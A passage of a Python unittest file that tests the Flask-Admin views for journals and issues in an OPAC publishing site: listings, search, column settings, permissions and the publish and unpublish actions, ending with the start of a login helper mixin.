create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's create_modal flag
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_journal_check_edit_modal_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- record editing uses a modal (edit_modal is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's edit_modal flag
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_journal_check_can_view_details_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- viewing record details is allowed (can_view_details is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_view_details flag
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_journal_check_actions_defined(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the journal list page: /admin/journal/
We check:
- it contains all the expected actions
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journals tab
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's actions
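# each entry in the template's 'actions' context variable is a
# (name, label) tuple; keep only the action names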
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_journal_action_publishing_an_unpublished_journal(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database (is_public=False)
When:
- we log in and
- open the journal list page: /admin/journal/
- run the publish action
We check:
- the journal becomes public
- the user is notified of the result of the operation
"""
# with
journal = makeOneJournal({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
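# bulk actions are served under the model's index URL, at '.../action/'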
publish_action_url = '%saction/' % journal_index_url
expected_msg = u'Periódico(s) publicado(s) com sucesso!!'
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journal list
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# run the publish action:
action_response = client.post(
publish_action_url,
data={
'url': journal_index_url,
'action': 'publish',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
def test_admin_journal_action_publishing_a_public_journal(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database (is_public=True)
When:
- we log in and
- open the journal list page: /admin/journal/
- run the publish action
We check:
- the journal stays public
- the user is notified of the result of the operation
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Periódico(s) publicado(s) com sucesso!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journal list
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'publish',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
def test_admin_journal_action_unpublish_default_a_public_journal(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database (is_public=True)
When:
- we log in and
- open the journal list page: /admin/journal/
- run the unpublish action (unpublish_default)
We check:
- the journal becomes unpublished
- the unpublish reason is: 'Conteúdo temporariamente indisponível'
- the user is notified of the result of the operation
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = 'Periódico(s) despublicado com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journal list
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'unpublish_default',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertFalse(journal.is_public)
self.assertEqual(expected_reason, journal.unpublish_reason)
def test_admin_journal_action_publish_with_exception_raised_must_be_consistent(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database (is_public=False)
When:
- we log in and
- open the journal list page: /admin/journal/
- run the publish action, but an exception is raised during the process
We check:
- the journal stays non-public (is_public=False)
- the user is notified that the operation failed
"""
# with
journal = makeOneJournal({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Ocorreu um erro tentando publicar o(s) periódico(s)!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journal list
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'publish',
'rowid': None,  # missing rowid should raise an exception
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertFalse(journal.is_public)
def test_admin_journal_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
With:
- a registered admin user (email confirmed)
- a new Journal record in the database (is_public=True)
When:
- we log in and
- open the journal list page: /admin/journal/
- run the unpublish action (unpublish_default), but an exception is raised during the process
We check:
- the journal stays public (is_public=True)
- the user is notified that the operation failed
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) periódico(s)!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the journal list
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'unpublish_default',
'rowid': None,  # missing rowid should raise an exception
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
class IssueAdminViewTests(BaseTestCase):
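"""Tests for the flask-admin Issue view, mirroring the Journal view
tests: listing, details, search, view configuration and the
publish/unpublish actions."""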
def test_admin_issue_list_records(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database
When:
- we log in and
- open the /admin/issue/ page
We check:
- the created Issue is listed on that page
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# open the issues tab
issue_list_response = client.get(url_for('issue.index_view'))
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# the response body contains the issue id
self.assertIn(issue.id, issue_list_response.data.decode('utf-8'))
def test_admin_issue_details(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database
When:
- we log in and
- open the issue detail page: /admin/issue/details/
We check:
- the page shows the right issue
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_detail_url = url_for('issue.details_view', id=issue.id)
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# open the issue detail page
issue_detail_response = client.get(issue_detail_url)
self.assertStatus(issue_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# the response body contains the issue id
self.assertIn(issue.id, issue_detail_response.data.decode('utf-8'))
def test_admin_issue_search_by_id(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database
When:
- we log in and
- open the issue list page: /admin/issue/
- search by the issue id
We check:
- the page shows the right issue
"""
# with
issue = makeOneIssue()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
issue_search_response = client.get(issue_index_url, query_string={'search': issue.id})
self.assertStatus(issue_search_response, 200)
# the search result contains the issue id
self.assertIn(issue.id, issue_search_response.data.decode('utf-8'))
def test_admin_issue_check_column_filters(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- it contains all the expected column_filters
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_col_filters = [
'journal',
'volume',
'number',
'type',
'start_month',
'end_month',
'year',
'is_public',
'unpublish_reason',
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column filters
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_issue_check_searchable_columns(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- it contains all the expected search fields
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_searchable_list = [
'iid', 'journal', 'volume', 'number',
'label'
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's searchable columns
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_issue_check_column_exclude_list(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- the fields excluded from the listing are the expected ones
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_exclude_list = [
'_id', 'sections', 'cover_url', 'suppl_text',
'spe_text', 'start_month', 'end_month', 'order', 'label',
'unpublish_reason'
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's excluded columns
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_issue_check_column_formatters(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- it contains all the expected column formatters
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_formatters = [
'created',
'updated',
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column formatters
column_formatters = self.get_context_variable('admin_view').column_formatters
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_issue_check_column_labels_defined(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- it contains all the expected field labels
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_column_labels = [
'iid',
'journal',
'sections',
'cover_url',
'volume',
'number',
'created',
'updated',
'type',
'suppl_text',
'spe_text',
'start_month',
'end_month',
'year',
'label',
'order',
'is_public',
'unpublish_reason',
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's column labels
column_labels = self.get_context_variable('admin_view').column_labels
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_issue_check_can_create_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- creating records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_create flag
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_issue_check_can_edit_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- editing records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_edit flag
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_issue_check_can_delete_is_false(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- deleting records is not allowed
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_delete flag
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_issue_check_create_modal_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- record creation uses a modal (create_modal is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's create_modal flag
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_issue_check_edit_modal_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- record editing uses a modal (edit_modal is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's edit_modal flag
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_issue_check_can_view_details_is_true(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- viewing record details is allowed (can_view_details is enabled)
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_view_details flag
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_issue_check_actions_defined(self):
"""
With:
- a registered admin user (email confirmed)
When:
- we log in and
- open the issue list page: /admin/issue/
We check:
- it contains all the expected actions
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issues tab
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's actions
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_issue_action_publishing_an_unpublished_issue(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database (is_public=False)
When:
- we log in and
- open the issue list page: /admin/issue/
- run the publish action
We check:
- the issue becomes public
- the user is notified of the result of the operation
"""
# with
issue = makeOneIssue({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
publish_action_url = '%saction/' % issue_index_url
expected_msg = u'Número(s) publicado(s) com sucesso!!'
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issue list
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# run the publish action:
action_response = client.post(
publish_action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_publishing_a_public_issue(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database (is_public=True)
When:
- we log in and
- open the issue list page: /admin/issue/
- run the publish action
We check:
- the issue stays public
- the user is notified of the result of the operation
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Número(s) publicado(s) com sucesso!!'
# when
with self.client as client:
# log in as the admin user
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# open the issue list
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_unpublish_default_a_public_issue(self):
"""
With:
- a registered admin user (email confirmed)
- a new Issue record in the database (is_public=True)
When:
- we log in and
- open the issue list page: /admin/issue/
- run the unpublish action (unpublish_default)
We check:
- the issue becomes unpublished
- the unpublish reason is: 'Conteúdo temporariamente indisponível'
- the user is notified of the result of the operation
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = 'Número(s) despublicado(s) com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the issue list
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'unpublish_default',
'rowid': issue.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertFalse(issue.is_public)
self.assertEqual(expected_reason, issue.unpublish_reason)
def test_admin_issue_action_publish_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issues: /admin/issue/
- realizamos a ação de publicacar, mas é levantada uma exceção no processo
Verificamos:
- o Issue deve ficar como não público (is_public=False)
- o usuario é notificado que houve um erro na operação
"""
# with
issue = makeOneIssue({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the issue list
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the publish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'publish',
'rowid': None, # missing rowid should raise an exception
},
follow_redirects=True
)
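# NOTE: if the POST above raises, assertRaises swallows the exception and
# the assertions below never run; if it does not raise, they run and then
# assertRaises itself fails on exiting the block.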
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
def test_admin_issue_action_unpublish_default_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Issue no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Issues: /admin/issue/
- realizamos a ação de despublicacar (unpublish_default), mas é levantada uma exceção no processo
Verificamos:
- o issue deve ficar como público (is_public=True)
- o usuario é notificado que houve um erro na operação
"""
# with
issue = makeOneIssue({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
issue_index_url = url_for('issue.index_view')
action_url = '%saction/' % issue_index_url
expected_msg = u'Ocorreu um erro tentando despublicar o(s) número(s)!!.'
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the issue list
issue_list_response = client.get(issue_index_url)
self.assertStatus(issue_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# run the unpublish action:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': issue_index_url,
'action': 'unpublish_default',
'rowid': None, # missing rowid should raise an exception
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
issue.reload()
self.assertTrue(issue.is_public)
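# The tests in this class (and in every class below) repeat the same
# login-and-act boilerplate. A minimal sketch of a mixin that could factor
# it out -- the names AdminLoginMixin, _login_admin and _run_action are
# hypothetical and not part of the original suite:
class AdminLoginMixin(object):
    def _login_admin(self, client, email='admin@opac.org', password='foobarbaz'):
        # create the confirmed admin user and log it in through the admin view
        create_user(email, password, True)
        return client.post(
            url_for('admin.login_view'),
            data={'email': email, 'password': password},
            follow_redirects=True)

    def _run_action(self, client, index_url, action, rowid):
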